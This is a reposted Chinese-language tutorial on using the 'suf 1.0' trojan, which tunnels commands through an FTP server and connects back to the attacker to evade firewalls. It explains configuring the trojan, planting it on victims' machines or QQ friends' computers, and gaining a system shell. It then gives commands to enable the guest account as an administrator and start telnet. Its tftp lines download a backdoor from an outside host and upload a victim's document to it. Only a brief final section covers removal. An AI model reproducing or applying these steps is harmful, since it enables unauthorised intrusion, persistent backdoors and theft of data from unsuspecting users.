[转帖]网络入侵也玩双通道

一个14岁的男孩经过无数次的实验，推出了一款全新的木马——suf 1.0，该后门运用了“反弹端口原理”与“ftp 隧道技术”，也就是两台机器不直接传输数据，而是利用第三台机器（ftp服务器）来交换数据.
　　suf（shell use ftp）顾名思义，就是通过ftp的shell。这种奇妙的思路真叫绝的，它充分利用防火墙“外严内不严”的漏洞，客户端生成服务端后，把客户端主机的ip发送到ftp里，然后别人运行服务端后下载ip文件，然后通过反向连接，使客户端知道服务端上线，然后把要执行的命令发送到ftp里，服务端再读取ftp里要执行的命令，最后完成执行。

　　说了这么一大堆，suf是不是真的有这么厉害？用事实来说明一切，跟我来……

　　一、摩拳擦掌——配置服务端

　　和一般的木马后门大体相同，首先将下载下来的suf 1.0解压缩，双击运行其中的client.exe，出现主窗口，非常简洁明了吧！点击“配置服务端”按钮，弹出了配置对话窗口，这里仅需要配置一下ftp服务选项。在“ftp”栏中填入一个有写权限的ftp服务器，如：ftp.abc.com或者220.202.242.98。接着在“端口”栏中填写好ftp服务器端口，默认为21。再在“用户名”和“密码”栏中输入ftp帐户名称和密码，点击“配置服务器”，出现一提示对话框，点击“确定”，这时程序就会开始验证ftp服务器，验证成功后请选择木马服务端（server.exe）的路径，最后完成配置。


　　小提示：如果要给服务端加壳，请在配置服务端之前给服务端（server.exe）加壳，服务端是可重复配置的。同时一定要确保使用的ftp帐户对ftp服务器有写的权限。

二、玩弄骨掌——轻松来控制


　　接下来是玩木马后门必不可少的环节，那就是种植木马。种植木马的方法、途径有很多，以前也专门有文章介绍过，大家可以发挥自己的聪明才智，把服务端上传到肉鸡或者发给qq好友等，当服务端程序被运行后，一般的使用者很难感觉到计算机有异常，防火墙也不会出现报警。其实，一只黑手正在慢慢靠近，服务端程序会自动从ftp服务器中获取客户端的ip地址，然后开始反向连接，这时服务端计算机的ip地址就会出现在客户端的“上线列表”中。

　　小提示：客户端计算机必须是直接连接到internet，而不能是处于内网中，同时，如果开启了防火墙的话，请打开5915端口。

　　在“上线列表”中双击某一在线计算机的ip（例如：220.202.242.100），出现“连接到220.202.242.100”对话窗口，这就已经得到了目标计算机的一个系统权限的shell，现在想干什么就自由发挥吧！

　　想想既然是送上门的肉鸡，还是留个后门，以便日后再次光顾吧！这里就将guest帐户激活，并提升为管理员，再开启目标计算机的telnet服务，下面就看如何来实现？请输入命令：net user guest /active:yes，点击“运行”来激活guest帐户，再运行命令：net localgroup administrators guest /add，将guest加入管理员组，最后再运行命令：net start telnet，开启目标计算机的远程登录服务。


　　其实，在这里有很多东东可以应用的，比如可以通过ftp命令或者tftp来远程下载/上传文件。这里假设已经知道有一个tftp服务器220.202.242.99，我们从服务器上下载一个后门程序sy.exe，只要运行命令：tftp 220.202.242.99 get sy.exe；要把肉鸡上的一个数据文档ccash.doc上传到tftp服务器只要运行命令：tftp 220.202.242.99 put ccash.doc。

　　小提示：windows自身附带了一个简单的文件上传下载程序tftp.exe，可要建立tftp服务器，就得借助tftpd32了。

　　三、摆脱控制——隔离隧道

　　虽然suf 1.0的实现方法非常隐蔽，可还是能够将其剿灭的，可以借助active ports(下载地址：http://www.ldcatv.com/soft/aports.rar)等端口实时监测工具来发现、中止它。如果中了suf后门，就可在“active ports”主窗口中发现两个server.exe进程，其中一个通过4319端口与ftp服务器进行通讯，另一个通过4321端口与客户端计算机进行通讯。选择它们，再点击“terminate process”来结束进程。然后在资源管理器中将server.exe删除，这样就摆脱了suf的控制。

14//.. ..